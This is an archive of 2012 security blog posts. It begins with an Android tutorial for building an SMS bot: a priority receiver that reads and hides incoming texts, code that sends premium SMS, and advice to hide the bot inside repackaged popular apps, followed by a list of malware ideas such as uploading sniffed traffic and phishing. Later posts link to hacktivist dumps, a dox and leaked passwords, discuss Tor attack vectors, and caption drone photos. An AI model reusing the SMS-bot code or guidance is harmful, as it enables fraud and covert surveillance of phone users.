public void onReceive(Context context, Intent intent) {

   }

  • Open up AndroidManifest.xml in Eclipse. Under the “Application” tab, find the section titled “Application Nodes”. Add a Receiver and set the “Name” to “.SmsReceiver”. The prepended dot is short for the application package name.
  • Highlight the “.SmsReceiver” row and Add an “Intent Filter”. All Receiver need to explicitly say what information they’re looking for, and his is how to do it. Set the Name to “android.provider.Telephony.SMS_RECEIVED”.
  • Now in AndroidManifest.xml, navigate to the “Permissions” tab. Add a “Uses Permission” named android.permission.RECEIVE_SMS. This is a requirement for any application that wants to receive the sms broadcast.

And with that, you have a class that receives all incoming SMS messages. To actually parse the message, I’m going to steal some code from the Android framework.

This code was copied (almost) directly from the Android source:

   public final SmsMessage[] getMessagesFromIntent(Intent intent) {

        Object[] messages = (Object[]) intent.getExtras().getSerializable(“pdus”);

        byte[][] pduObjs = new byte[messages.length][];

        for (int i = 0; i < messages.length; i++) {

            pduObjs[i] = (byte[]) messages[i];

        }   

        byte[][] pdus = new byte[pduObjs.length][];

        int pduCount = pdus.length;

        SmsMessage[] msgs = new SmsMessage[pduCount];  

        for (int i = 0; i < pduCount; i++) {

            pdus[i] = pduObjs[i];

            msgs[i] = SmsMessage.createFromPdu(pdus[i]);

        }

            return msgs;

    }

Now we can inspect the messages and react accordingly:

public void onReceive(Context context, Intent intent) {

      SmsMessage[] messages = this.getMessagesFromIntent(intent);

      for(SmsMessage msg : messages) {

         // sender can be found in msg.getDisplayOriginatingAddress()

         // body can be found in msg.getDisplayMessageBody()

      }

   }

Hiding SMS

So what if we decide that the message shouldn’t be shown to the user? If we’re the first ones to receive the broadcast, we can make sure nobody else gets it with a call to abortBroadcast(). To make sure we’re the first ones to get it, we need to raise our Receiver’s priority:

  • Open AndroidManifest.xml again and navigate to the “Application” tab.
  • Select the “Intent Filter” created earlier, and set “Priority” to “999″

For some broadcasts, a higher priority means you get the message earlier and can abort earlier. Beyond some number, you drop back down to the lowest priority. I haven’t tried to figure out the number (probably Integer.MAX_VALUE or Long.MAX_VALUE).

Sending SMS

Now to respond (or for premium sms), you need to be able to send sms:

  • AndroidManifest.xml, add the “android.permission.SEND_SMS” in the same way you added “android.permission.RECEIVE_SMS”

And… well, that’s pretty much it. You can now send sms messages with the following code:

SmsManager sm = SmsManager.getDefault();

sm.sendTextMessage(“phone-number-here”, null, “message”, null, null);

This is really all you need to start writing your own sms bot for Android. You can do basically anything without root exploits, as long as you can convince a user to keep the app on his phone. This isn’t a problem at all if you’re repackaging popular apps with this running in the background (see Sharing and Modding Android Apps). Keep in mind the root exploits are really only useful for hiding permissions from the user and staying on the phone after an uninstall (or preventing an uninstall).

If you have questions about this or some other Android features/malware, feel free to post here. I’m considering making an Android exploit kit, but I need there to be more interest in it. And if you’re having trouble coming up with other ideas…

  • Send annoying notifications until the user sends some sms (to avoid needing the SEND_SMS permission)
  • Load tcpdump to sniff all network traffic and upload the results to your server
  • Hijack bookmarked web pages for advanced phishing
  • Fake SMS for advanced phishing
  • Steal a huge amount of info and send SMS for advanced social engineering
  • Load code dynamically for future root exploits or for very flexible bots (or PPI)
  • Display ads while the user is away for revenue
  • etc, etc

Sharing and Modding Android Apps

This is a guide to move an app to your computer so you can mod it as you like. It isn’t a guide to cracking applications. This is an alternative to using an “App to SD” app, a lot of which are apparently buggy any don’t work on all apps. As far as I know, this method always works, and it gives you the option of automating the task.

Tools you’ll need

Android SDK: This comes with a bunch of tools you can use to communicate with your phone. The ones we care about are adb, used to communicate between your computer and a running android device, and android, a front-end to an android emulator. http://developer.android.com/sdk/index.html

Baksmali: This program understands and disassembles Android’s binaries to smali, an assembly language for Android applications. http://code.google.com/p/smali/downloads/detail?name=baksmali-1.3.0.jar&can=2&q=

Smali: This program converts smali assembly files into dex files. This will be used to apply any modifications to applications. http://code.google.com/p/smali/downloads/detail?name=smali-1.3.0.jar&can=2&q=

Java: You’ll need it to run baksmali. You can use your package manager to install this or use the link below. Remember to disable Java plugins in your web browser for being an infectious piece of shit. http://www.java.com/en/download/manual.jsp?locale=en

Setting everything up

Unpack the Android SDK to any directory and navigate to the tools folder. You’ll see a bunch of executables in here. I’m going to assume that this folder is now in your PATH environment variable so you can access them from anywhere. Google “set path variable windows|linux|mac” if you don’t know how to do this.

Now create a folder anywhere named “apps” and copy both baksmali.jar and smali.jar into there. This is where your applications will be copied to. Open a terminal or command prompt and navigate to this directory. From this point on, I’ll assume that baksmali.jar and smali.jar are in the working directory.

Your phone should have come with a USB charger. This charger doubles as general way of talking to your phone (not just transfer files). To do this…

  • Hook up your phone to your computer using the USB charger
  • Navigate to Settings -> Applications -> Development
  • Enable USB Debugging

At this point, you can play around with a shell on your phone with

adb -d shell

Now we’ll have to grab some files from your phone so those platform-specific odex files can be converted to platform-independent dex files. These command will probably get everything you need (copy/paste is your friend):

adb -d pull /system/framework/services.odex

adb -d pull /system/framework/framework.odex

adb -d pull /system/framework/android.policy.odex

adb -d pull /system/framework/ext.odex

adb -d pull /system/framework/javax.obex.odex

adb -d pull /system/framework/core.odex

adb -d pull /system/framework/pm.odex

adb -d pull /system/framework/ime.odex

adb -d pull /system/framework/bmgr.odex

adb -d pull /system/framework/am.odex

adb -d pull /system/framework/input.odex

adb -d pull /system/framework/svc.odex

If a command in a later step ever complains about a missing file.odex, and if the application runs on your phone, then you should run the following to get that file:

adb -d pull /system/framework/file.odex

Copying over the apps

Now to actually grab an application. All installed applications are stored in /system/app. If you’ve ever developed an application, you probably know that an apk file is the format that Android knows how to install, and it contains everything about the app. So if you want to share an app with other people, that’s what you would need to grab. Unfortunately, Android splits up the actual code from the metadata, and the apk files in this folder only contain the metadata. The code code for MyApp.apk is stored in the optimized, platform-specific MyApp.odex. We’ll have to make this platform-agnostic and recombine the two files.

Pull both files.

adb -d pull /system/app/MyApp.apk

adb -d pull /system/app/MyApp.odex

And decompile the odex file so it can be easily modified:

java -jar baksmali.jar -x MyApp.odex -o MyApp

At this point, you can apply whatever changes you want before recompling the application into a platform-independent apk. To recompile the application:

java -jar smali.jar MyApp -o classes.dex

And move it into the apk file. This can be done with any zip-modifying utility, like 7zip. I like to do this using the zip utility in linux:

zip -g MyApp.apk classes.dex

And that’s all! If you want to re-install the application, you’ll have to resign the new apk following the instructions in the following link. If anyone asks for it, I can append an abridged guide here. http://developer.android.com/guide/publishing/app-signing.html

Congratulations! You can now modify and share your Android applications! Post here if you have any problems following this guide, I’ll be glad to help.

07/9/12

Latino Hacktivist on the Rise

gAtO cHeKs –  http://pastebin.com/trends“>http://pastebin.com/trends  – every day or so just to get a pulse on the hacktivist movement. One thing has change I see more and more Latinos getting involved in social cyber activist. Below is a break down of what I saw it’s good to see Latino nation using the social media for political dialog. As more of the world understands the importance of the new ways of connecting via the matrix, we will have more freedom of speech in cyberspace for everyone.

Let’s take a look at what my Latino brothers and sisters, si – Latina women are very much in the hacktivist roles all over Twitter sphere (#tangodown #dos ). Let’s take a look at today Sunday 1407 July,8 2012 -

A few post – goes out to the new cyber latino hacktivist and of course give thanks to Sweden and Italy brothers and sisters that have help the education of the spanish crowd-source with cyber hacktivist 101. But this was a big hit to -.MX Mexico is becoming a new cyber hot-bed for these cyber strikes –/ I have seen more and more hacktivist attacks at the Mexican politicals like MEGAMARCHA- against  “Public Radio International” or their message../ mAyBe nO-sI –-  it’s about the PRI Mexican Party, corruption and the protesters went for both, that party and the Radio noise that helped them.

Besides Mexico, you have a push at UASD from a few sources with the Spanish hacktivist–/  a -DoX from Columbia I think  and a plan for the Olympics cyber lulz. From the Latino community this is a big show and tell on pasternBin.com  – gAtO oUt

Reference:

.02.) Mexico 1. http://pastebin.com/CRu8raYU #PrimaveraMexicana—— #Anonymous #Opmexico #Megamarcha #ExigimosDemocracia #PrimaveraMexicana#PrimaveraMexicana

 

.01.) Mexico MEGAMARCHA -MEGAMARCHA! this was the new dump: http://pastebin.com/HcCN7kCv

  1. MADE BY CONDOR SECTOR404. SALUDOS HERMANOS
  2. MEGAMARCHA VS el pri a le horas que usteden quierena empezamos:
  3. SALUDOS LATINOAMERICA,IBEROAMERICA,ANONEXICO,ANONIMOUSMEXICO,BRASIL,OPCOSTARICA,OPINDIA,ANONSWEDEN,ITALY

 

Latino Hacktavist- gAtOmAlO2

Latino Hacktavist- @gAtOmAlO2

 

1.) Mexico 1. #Anonymous México. #OpMarchaPacifica – Untitled  http://pastebin.com/S8kZ02Ua

2.) Operación #OPSalvemos a la #UASD, Gracias por Leer esto #Op Salvemos la UASD. –http://pastebin.com/z1qTzz3n

3.) FALSA BANDERA OLIMPIADAS 2012 (NUEVOS AÑADIDOS) -Olympic Plans Overview – This is a planing stage Olympics latino based in London http://pastebin.com/T5Gu6p6s

4.) A spanish DoX – DOXEO JUAN PABLO FRANZONI http://pastebin.com/2WGmPgcx 

5.) Dominican Anonymous.-Anonymous Explica como esta hackiando la pagina de la UASD. http://pastebin.com/G5yE6uGr  – Administrators or webmaster of the site of the #UASD

6.) Mexico – Leaks Name & Password http://pastebin.com/GjTGdC6k -@Anonymousbr11  @Anon_central @AnonymousOIC  Target:http://www.isc.gob.mx

05/21/12

USCyberLabs -New Site in the Deep Web

gAtO JuSt -wanted to invite you to a new place in the Deep, Dark Web – sounds nefarious (;-) nah – The .onion network is just a place to stay anonymous – there are legit reasons why someone may want to see information in a more private way, so I have just started the new site in the ToR Network:

Deep Web gAtO - mEoW

http://4eiruntyxxbgfv7o.onion/snapbbs/19cc6d6e/ =+ USCyberlabs.com

On this BBS board I will post everything I do in the clearWeb uscyberlabs.com . Since it’s open to anyone I wonder what and who will see it and post in it – it should be fun… Please feel free to stop and visit if your in the deepWeb and want to come in and tell me secrets or tell me that I’m full of it. It is open to the public and anyone can come in and browse and post. I want to keep it clean a Gray-White Hat place to distribute information. But I will try not to edit stuff gATO oUt

05/21/12

Attacking a ToR Network

Attacking a ToR .network

gAtO hAs- found that there are a few ways to attack a secure network some is old fashion technology and some more modern. The FBI and Secret Service and other international law enforcement have used these technique and they have been de-classified:

UPDATE: -5-21-2012 -0900 There a re few more attack vectors that I recently found in the .onion network – let’s just say attack from within that – If you are a legit-legal Security Researcher please write me. I want to keep those secret for now –

Let’s take a look at:

The Cold Boot Attacks

One of the problems with encryption is that in order for it to work, your computer has to know the private key and any other information needed for decryption. This information is stored in memory and while memory isn’t a good place to store things long term, it does store data for an amount of time from seconds to minutes after your machine has been turned off. An adversary, knowing that they are facing a locked down machine with lots of encryption, may perform a cold boot attack. This involves turning off your computer, spraying your memory with liquid nitrogen (or something to keep it cold), and then recovering your encryption key from memory. Once frozen, data in memory can be retained (and then further reconstructed) for hours. Countermeasures:  If you feel this is a risk, you need to implement physical security measures that deal with the possible threat. This could be as simple as a laser tripwire on a door that triggers a shutdown.

Radio Leakage, TEMPEST, etc.

All electronics create radio interference as a consequence of their operation. While this radio interference is often useless it can also provide valuable information for your adversary. For instance, the radio interference generated by keyboards can divulge your passwords to an adversary sitting across the street from your house. RF shielding is the only solution for this problem and involves surrounding your machine in some type of metal. This isn’t all though, as the power pull generated when you use the keyboard, etc. can also be monitored through your wall socket. I don’t know of any solutions to this. One idea would be to lock your machine in a box with a UPS to filter the electricity and a security scheme similar to the one used to prevent cold boot attacks but I’m not sure how effective this would be. Countermeasures: Get some chicken wire and build a faraday cage for all your secure computing equipment. What ever music you like play it loud I would suggest Metal this is filled with so many harmonics that it will very hard to extract the EMF.

Physical Security

An adversary may put a camera, microphone, or some other recording device in the room with your hidden service machine. If they capture your encryption passphrase, your data will be compromised. Recently the FBI and Secret Service used this technique against a bust of the ShadowCrew carding board and it’s been used for a long time by both law enforcement and intelligence. While using a blanket will deter a camera, the audio generated by your keyboard may not be sufficiently muffled to stop a microphone from knowing what’s going on. Countermeasures:  Always be careful of anyone coming into the place were your computing equipment or office. Remember that todays technology has WiFi cameras and all kinds of devices. Also check you router to see any weird connections to it and remember the logs they will show failed attempts to access your network. Another way is to scan for SSID with Kismet or NetStumbler you may be able to scan for the device. And for microphones : What ever music you like play it loud I would suggest Metal this is filled with so many harmonics that it will very hard to extract the from the noise.

Traffic Correlation

If your adversary suspects you run a hidden service, they can watch your internet connection and try to use traffic analysis to determine if the hidden service is run on your network. If your adversary downloads a few 50 megabyte files from your server and every time around 50MB of encrypted traffic goes across your network, it’s pretty good evidence. Combine that with shutting off the power to your machine and watching the hidden service go down and you’ve got somebody who knows what’s going on.  Countermeasures: There are creative ways of dealing with this such as cover traffic, UPSs, redundant servers, and physical security.

a government censor can render it moot by simply blocking the relays

 

gAtO hopes that this will help you understand that the ToR network a little better and don’t worry the Tor Project is working hard on Traffic Correlation attacks. – gAtO oUt 

 

https://blog.torproject.org/blog/research-problem-measuring-safety-tor-network

 

05/20/12

Cyber Warrior Drones of War

 gAtO wAs – looking into the modern Air/Sea cyber warfare and came across these pictures from - cryptome.org this is really some cool shot and we can only imagine the future. In 5 to 10 years these cyber warriors may well be autonomous air warriors not just guided by man but under computers control. From Nato to the U.S everyone is getting into the remote killing machines. I think of SkyNet in the Terminator movie and we are not far off the mark.

Now add state actors hackers to terrorist hackers if they get their hands on these babies well the mayhem and destruction they will cause will make your head spin. The sad fact is as more and more of these remote killers are used, we will become more desensitize to the horror of war. The only reason gATo hates war is because I been at the killing field, I was in it and did my share and after the battle and the buzz wears off , the horror that I had just committed will haunt me forever. These machines will not. When it’s all a video game we will just go for the high score and go to the next level– gAtO oUt

Drone Photos

[Image]In this March, 28, 2012, photo, an Arcti Copter 5 drone flies over a waterfront
park in Berkeley, Calif. Interest in the domestic use of drones is surging
among public agencies and private citizens alike, including a thriving subculture
of amateur hobbyists, even as the prospect of countless tiny but powerful
eyes circling in the skies raises serious privacy concerns. (Eric Risberg)
[Image]In this March, 28, 2012, photo, Mark Harrison, left, and Andreas Oesterer,
right, watch as a Ritewing Zephyr II drone lifts off at a waterfront park
in Berkeley, Calif. Interest in the domestic use of drones is surging among
public agencies and private citizens alike, including a thriving subculture
of amateur hobbyists, even as the prospect of countless tiny but powerful
eyes circling in the skies raises serious privacy concerns. (Eric Risberg)
[Image]A quadrocopter drone equipped with a camera stands on display at the Zeiss
stand on the first day of the CeBIT 2012 technology trade fair on March 6,
2012 in Hanover, Germany. CeBIT 2012, the world’s largest information technology
trade fair, will run from March 6-10, and advances in cloud computing and
security are major features this year. Getty
[Image]A drone equipped with cameras and sensors flies over a simulation of a
contaminated area during a training exercise of a nuclear accident following
an earthquake in the region of the nuclear site of Cadarache, January 17,
2012. Reuters
[Image]Israeli soldiers dismantle the Skylark drone during a drill on January 16,
2012 near Bat Shlomo, Israel. The Skylark can carry a camera payload of up
to 1kg, has an operational calking of 15,000ft and allows users to monitor
any designated point within a 15km radius. The Skylark unit consists of a
ground control element and three drones, which provide battalion-level commanders
with real-time information. Getty
[Image]A TV drone flies beside Canada’s Erick Guay during the second practice of
the men’s Alpine skiing World Cup downhill race at the Lauberhorn in Wengen,
January 12, 2012. Reuters
[Image]Advanced Defense Technology Centre engineer Fumiyuki Sato demonstrates his
spherical observation drone at the opening of the annual Digital Contents
Expo in Tokyo on October 20, 2011. The Japanese defence researcher has invented
a spherical observation drone that can fly down narrow alleys, hover on the
spot, take off vertically and bounce along the ground. Getty
[Image]President of French far-right party Front national (FN) and candidate for
the 2012 French presidential election Marine Le Pen looks at a drone helicopter
at the stand of French company Eden as she visits on October 19, 2011 in
Paris, at the the France’s Milipol global security trade fair on October
18, 2011 in Paris. Milipol Paris 2011, welcoming more than 1,000 exhibiting
companies from 43 countries, runs until October 21. Getty
[Image]This Sept. 2011 photo provided by Vanguard Defense Industries, shows a ShadowHawk
drone with Montgomery County, Texas, SWAT team members. Civilian cousins
of the unmanned military aircraft that have been tracking and killing terrorists
in the Middle East and Asia are being sought by police departments, border
patrols, power companies, news organizations and others who want a bird?s-eye
view. AP
[Image]A Pakistani villager holds a wreckage of a suspected surveillance drone which
is crashed in Pakistani border town of Chaman along the Afghanistan border
in Pakistan on Thursday, Aug 25, 2011. Suspected US surveillance drone crashes
in Pakistan military area near border with Afghanistan. (Shah Khalid)
[Image]A maple seed is seen on the hand of Craig Stoneking, bottom, project manager
at Lockheed Martin Advance Technology Laboratories, as engineer David Sharp
holds the company’s new drone, Wednesday, Aug. 10, 2011, in Southampton,
N.J. The unmanned, one-winged flight machine is based on the flight of maple
seeds that twirl down from trees during the spring. AP
[Image]Pakistani officials collect remains of a Pakistan Navy unmanned aerial vehicle
(UAV) which crashed outside an oil refinery in Karachi, Pakistan on Tuesday,
July 19, 2011. According to a Pakistan Navy official, the accident was caused
by a bird hit. No casualties were reported. (Shakil Adil)
[Image]Dr. Gregory Parker, Micro Air Vehicle team leader, holds a small winged drone
that resembles an insect, in the U.S. Air Force Micro Air Vehicles lab at
Wright Patterson Air Force Base in Dayton, Ohio, July 11, 2011. The Micro
Air Vehicles unit of the Air Force Research Laboratory at Wright Patterson
AFB is developing small military drones, with the goal of making them so
small that they resemble small birds and insects, including some that will
have moving wings. The mission is to develop MAVs that can find, track and
target adversaries while operating in complex urban environments. The engineers
are using a variety of small helicopters and drones in the lab to develop
the programs and software. Testing takes place in a controlled indoor lab
where the team flies the MAVs and then gathers data to analyze for further
development. Reuters
[Image]A model of an insect size U.S. Air Force drone is held by a member of the
Micro Air Vehicles team of the Air Force Research Laboratory, which is developing
small drones at Wright Patterson Air Force Base in Dayton, Ohio, July 11,
2011. Reuters
[Image]A computer controlled U.S. Air Force drone prepares to lift off for a test
flight of in the Micro Air Vehicles lab at Wright Patterson Air Force Base
in Dayton, Ohio, July 11, 2011. Reuters
[Image]This product image provided by Parrot, shows the AR.Drone. Parrot, a company
known more for its Bluetooth hands-free car speakerphones, has launched a
small, unmanned aircraft that can be controlled using an iPhone or another
of Apple Inc.’s Wi-Fi-enabled gadgets, including the iPod Touch and the
iPad.(Parrot)
[Image]This undated handout photo provided by the U.S. Air Force shows a MQ-9 Reaper,
armed with GBU-12 Paveway II laser guided munitions and AGM-114 Hellfire
missiles, piloted by Col. Lex Turner during a combat mission over southern
Afghanistan. (Lt. Col.. Leslie Pratt, US Air Force)
[Image]This undated photo provided by U.S. Customs and Border Protection shows an
unmanned drone used to patrol the U.S.-Canadian border. The planes, which
are based out of North Dakota, are now venturing as far as Eastern Washington
on their patrols. (U.S. Customs and Border Protection)
[Image]

U.S. Navy Boatswain’s Mate 3rd Class Christian Riddle, left, and Boatswain’s
Mate 2nd Class Dante Galati secure a recovered Air Force BQM-74C Chukar III
aerial target drone to a crane aboard USS Tortuga (LSD 46) after an at-sea
exercise for Cooperation Afloat Readiness and Training (CARAT) 2011 in the
South China Sea June 11, 2011. CARAT is a series of bilateral exercises held
annually in Southeast Asia to strengthen relationships and enhance force
readiness. (U.S. Navy photo by Mass Communication Specialist 2nd Class Katerine
Noll/Released)[Image]

An X-47B Unmanned Combat Air System Demonstrator (UCAS-D) completes its first
flight at Edwards Air Force Base, Calif., Feb. 4, 2011. The UCAS-D program
will demonstrate the capability of an autonomous, low-observable unmanned
aircraft to perform carrier launches and recoveries. (DoD photo courtesy
of Northrop Grumman/Released). Date Shot: 2/4/2011

[Image][Image]

Air Photo Service
Co. Inc
, Japan, January 2011[Image]

U.S. Army Sgt. Brian Curd, and Spc. Nicholas Boxley, both combat engineers,
from Echo Company, 1st Battalion, 68th Armor Regiment, 3rd Advise and Assist
Brigade, 4th Infantry Division, prepare the RQ-16A Tarantula Hawk unmanned
aerial vehicle, for operation, at Basra province, Iraq, Dec. 1, 2010. Although,
T-Hawk requires a great deal of maintenance, the capabilities it provides
are well worth the time spent. (U.S. Army photo by 2nd Lt. Matthew
Fumagalli/Released). Date Shot: 12/1/2010[Image]

Engineers, from left, Daniel Braun, Eric Sanchez and David Barney, with Space
and Naval Warfare Systems Command Systems Center Pacific, perform pre-deployment
inspections on Littoral Battlespace Sensing Unmanned Undersea Vehicles aboard
the oceanographic survey ship USNS Pathfinder (T-AGS 60) while portside in
San Diego, Calif., Oct. 21, 2010. Each vehicle hosts a payload suite of sensors
that will measure the physical characteristics of the water column as it
routinely descends and ascends in the ocean. (U.S. Navy photo by Rick
Naystatt/Released). Date Shot: 10/21/2010[Image]

U.S. Navy Aerographer’s Mate Airman Alex Boston, left, and Aerographer’s
Mate 3rd Class Ryan Thuecks, right, both assigned to the Naval Oceanography
Mine Warfare Center, and Ana Ziegler, with the Office of Naval Research,
deploy an unmanned underwater vehicle during exercise Frontier Sentinel in
the northern Atlantic Ocean June 9, 2010. The annual joint maritime homeland
security exercise involved the Canadian navy, the U.S. Navy and Coast Guard,
and federal, state, and local agencies in the detection, assessment and response
to maritime security threats. (U.S. Navy photo by Wayne Stigstedt/Released).
Date Shot: 6/9/2010[Image]

U.S. Navy Sonar Technician Surface 1st Class Bryson Menke and Mineman 3rd
Class Michael Darcy, both stationed with Explosive Ordnance Disposal Mobile
Unit (EODMU) 1, prepare to deploy an unmanned underwater vehicle April 22,
2010, in the Persian Gulf. EODMU-1 and USS Dextrous (MCM 13) are conducting
drills. (U.S. Navy photo by Mass Communication Specialist 2nd Class Ja’lon
A. Rhinehart/Released). Date Shot: 4/22/2010[Image]

Danielle Bryant, right, an oceanographer from the Naval Oceanographic Office
(NAVOCEANO), establishes a satellite connection to the Glider Operations
Center at NAVOCEANO before launching the seaglider unmanned underwater vessel
from the Military Sealift Command oceanographic survey ship USNS Henson (T-AGS
63) March 24, 2010, in the Atlantic Ocean. The vessel is designed to collect
physical oceanography data in deep water. Henson is under way off the coast
of Fortaleza, Brazil, for Oceanographic-Southern Partnership Station 2010
conducting survey demonstrations with the Brazilian Directorate of Hydrograph
and Navigation. Oceanographic-Southern Partnership Station is an oceanographic
surveying and information exchange program between subject matter experts
with partner nations in the U.S. Southern Command area of responsibility.
(U.S. Navy photo by Mass Communication Specialist 2nd Class Lily
Daniels/Released). Date Shot: 3/24/2010[Image]

U.S. Navy Sonar Technician (Surface) 2nd Class Brad Goss, right, and Sonar
Technician (Surface) 1st Class Anthony Craig, left, from the Littoral Combat
Ship Anti-Submarine Warfare (LCS ASW) Mission Package detachment, operate
an unmanned surface vehicle (USV) in the waters of the Narragansett Bay,
R.I., Feb. 16, 2010. The Naval Undersea Warfare Center Division Newport is
developing the USV for future LCS ASW operations. (U.S. Navy photo/Released).
Date Shot: 2/16/2010[Image]

U.S. Navy Mineman Seaman James Raper pushes the mine neutralization vehicle
(MNV) of the mine countermeasures ship USS Defender (MCM 2) into its cradle
Nov. 24, 2009, in the Yellow Sea. An MNV is a remote-controlled, unmanned
submarine that uses a video camera to confirm the presence of underwater
mines. Defender is participating in exercise Clear Horizon, an annual exercise
conducted with the Republic of Korea Navy, that is one of the largest
international mine counter-measures exercises in the world. (U.S. Navy photo
by Mass Communication Specialist 1st Class Richard Doolin/Released). Date
Shot: 11/24/2009[Image]

The U.S Air Force Academy’s Viking 300 aircraft, an unmanned aerial system,
flies over Camp Red Devil at Fort Carson, Colo., July 22, 2009. The Air Force
Academy is the first military service academy to begin integrating unmanned
aerial systems into its curriculum. (U.S. Air Force photo by Mike
Kaplan/Released). Date Shot: 7/23/2009[Image]

An Unmanned Little Bird helicopter, a smaller version of the manned A/MH-6M
Little Bird helicopter, is tested and evaluated by personnel from the U.S.
Marine Corps’ Warfighting Laboratory at Marine Corps Combat Development Command,
Quantico, Va., June 16, 2009, in Bridgeport, Calif., during Javelin Thrust-09.
Marine Forces Reserve, headquartered in New Orleans, is conducting Javelin
Thrust-09 at six locations throughout the Western United States. The combined
arms exercise showcases a range of combat and logistics capabilities and
allows leaders to assess the operational readiness of participating units.
More than 2,000 reserve- and active-component Marines, Sailors, Soldiers
and Airmen are training simultaneously in support of the exercise. (U.S.
Marine Corps photo by Chief Warrant Officer Keith A. Stevenson/Released).
Date Shot: 6/16/2009[Image]

Dirk D. Reum, a robotic systems engineer, conducts a systems check of a robotic
unmanned ground vehicle (RUGV) June 13, 2009, in Hawthorne, Nev., before
making it available for test training with U.S. Marine Corps infantrymen
of India Company, 3rd Battalion, 23rd Marine Regiment, 4th Marine Division,
during exercise Javelin Thrust 2009. The RUGV has a payload capacity of 1,400
pounds. Javelin Thrust showcases a wide range of combat and logistics
capabilities, and allows leaders to assess the operational readiness of
participating units. More than 3,000 reserve and active component Marines
and members of the Navy, Army and Air National Guard will train during the
combined arms exercise at six locations throughout the Western United States.
(U.S. Marine Corps photo by Chief Warrant Officer 2 Keith A. Stevenson/Released).
Date Shot: 6/13/2009[Image]

The Heron TP medium altitude long endurance unmanned aerial vehicle takes
off from Comalapa International Airport in San Salvador, El Salvador, May
21, 2009, during a counter drug operations support mission. The Heron is
part of an unmanned aircraft system deployed to El Salvador to support Project
Monitoreo, a month-long evaluation initiative to assess the suitability of
using unmanned aircraft for counterdrug missions in the United States Southern
Command area. (U.S. Army photo by Jose Ruiz/Released). Date Shot: 5/21/2009[Image]

The U.S. Navy and Spatial Integrated Systems Inc. demonstrate a fully autonomous
Unmanned Surface Vehicle (USV) near Fort Monroe, Va., Jan. 14, 2009. The
USV uses its autonomous maritime navigation systems to patrol and detect
intruders. (U.S. Navy photo by Mass Communication Specialist Seaman Apprentice
Joshua Adam Nuzzo/Released). Date Shot: 1/14/2009[Image]

U.S. Navy Lt. Timothy Stanford, a graduate student at University of Wisconsin,
tests his Autonomous Unmanned Vehicle (AUV) prior to competing in the Association
for Unmanned Vehicle Society International’s (AUVSI) 11th annual competition
in San Diego, Calif., Aug. 1, 2008. AUVSI, in cooperation with the Space
and Naval Warfare Systems Center, hosts the event to encourage young engineers
and scientists to consider careers developing AUV technologies for the U.S.
Navy. (U.S. Navy photo by Mass Communication Specialist 2nd Class Brian
Gaines/Released). Date Shot: 8/1/2008[Image]

Fox News reporter Phil Keating interviews U.S. Navy Capt. Robert Dishman,
the Persistent Maritime Unmanned Aircraft Systems Program Office 262 Program
Manager, in front of the Skyship 600 blimp at Naval Air Station Key West,
Fla., July 10, 2008. The lighter-than-air vehicle is in Key West for six
weeks to conduct a series of maritime surveillance evaluations. The joint
airship experiment between the U.S. Navy and Coast Guard emphasizes the
cooperative strategy for 21st century seapower among the sea services. (U.S.
Navy photo by Mass Communication Specialist 2nd Class Rachel McMarr/Released).
Date Shot: 7/10/2008[Image]

An unmanned aerial vehicle’s Predator Hellfire missile is shown on a simulator’s
virtual camera at the March Air Reserve Base in Riverside County, Calif.,
June 25, 2008. As the U.S. military scrambles to get more robotic warplanes
like the Predator drone aloft, it is confronting an unexpected adversary:
human error. (Damian Dovarganes)[Image]

Secretary of Defense Robert M. Gates learns how to operate an unmanned ground
vehicle during a tour of the future combat systems facility at Fort Bliss,
Texas, May 1, 2008. (Department of Defense photo by Cherie Cullen/Released).
Date Shot: 5/1/2008[Image]

A Condor unmanned aerial vehicle sits on top of its carrying case before
flying during Atlantic Strike V at the air-ground training complex in Avon
Park, Fla., April 17, 2007. Atlantic Strike is a U.S. Central Command Air
Forces initiative and the only joint, tactical-level, urban, close air support
training event dedicated to supporting the war on terror. (U.S. Air Force
photo by Staff Sgt. Stephen Otero) (Released). Date Shot: 4/17/2007[Image]

US Marine Corps (USMC) Marines, 15th Marine Expeditionary Unit (MEU) show
the US Navy (USN) Sailors aboard the USN Wasp Class Amphibious Assault Ship
USS BOXER (LHD 4) the “Silver Fox” Unmanned Aerial Vehicle (UAV). The 15th
MEU and the BOXER are part of Expeditionary Strike Group (ESG) 5 which is
currently participating in their Composite Training Unit Exercise (COMPTUEX)
off the coast of Southern California. U.S. Navy photo by Mass Communication
Specialist Third Class Noel Danseco (RELEASED). Date Shot: 7/16/2006[Image]

Engineers check the structure after the test flights of the Navy-built Guardian
Griffin unmanned aerial vehicle (UAV). The flights demonstrated its capability
to support U.S. joint forces with missions ranging from convoy escort and
port security to combat patrol. U.S. Navy photo by Mr. John Joyce (RELEASED).
Date Shot: 5/18/2006[Image]

The Proteus aircraft takes off from Mojave Airfield near Edwards Air Force
Base, Calif., on May 9, 2006. It carries the pod that eventually will contain
the radar that will be used on the Global Hawk unmanned aerial vehicle. A
year of testing, that will be conducted by the 851st Electronic Testing Group,
will begin in September once the radar is installed on Proteus. (U.S. Air
Force photo) (Released). Date Shot: 5/9/2006[Image]

Northrop Grumman’s RQ-8A Fire Scout Vertical Takeoff and Landing Tactical
Unmanned Aerial Vehicle (VTUAV) test fires the second of two Mark (MK) 66
2.75-inch unguided rockets during weapons testing at Arizona’s Yuma Proving
Grounds. The Fire Scout has the ability to autonomously take off and land
from any aviation-capable warship and at unprepared landing zones, with an
on-station endurance of over four hours. The Fire Scout system is capable
of continuous operations, providing coverage at 110 nautical miles from the
launch site. Utilizing a baseline payload that includes electro-optical/infrared
sensors and a laser rangefinder/designator the Fire Scout can find and identify
tactical targets, track and designate targets, accurately provide targeting
data to strike platforms, employ precision weapons, and perform battle damage
assessment. Photographer’s Name: TIM PAYNTER, CIV. Date Shot: 7/25/2005[Image]

U.S. Air Force Tech. Sgt. Patrick Vasquez, a Force Protection Airborne
Surveillance System (FPASS) operator from the 99th Security Forces Group,
prepares to release a Desert Hawk unmanned aerial vehicle during an urban
warfare training at Indian Springs Auxiliary Air Field, Nev., on May 4, 2005.
The Desert Hawk gives real-time video surveillance to FPASS operators who
in turn are able to instantly relay enemy force locations to the troops in
the field. (U.S. Air Force photo by Master Sgt. Robert W. Valenca) (Released).
Date Shot: 5/4/2005[Image]

A U.S. Air Force BQM-167A Unmanned Aerial Vehicle (UAV) is launched from
Tyndall Air Force Base, Fla., on Dec. 22, 2004. The BQM-167A is powered by
a ventrally mounted turbojet engine. It can be air or ground launched, and
can carry the full range of current target payloads, including radar enhancers,
countermeasures, scoring devices, and towed targets. (USAF Photo by Bruce
Hoffman, CIV) (Released). Date Shot: 12/22/2004

[Image]

A Boeing ScanEagle Unmanned Aerial Vehicle (UAV) sits on top of a table during
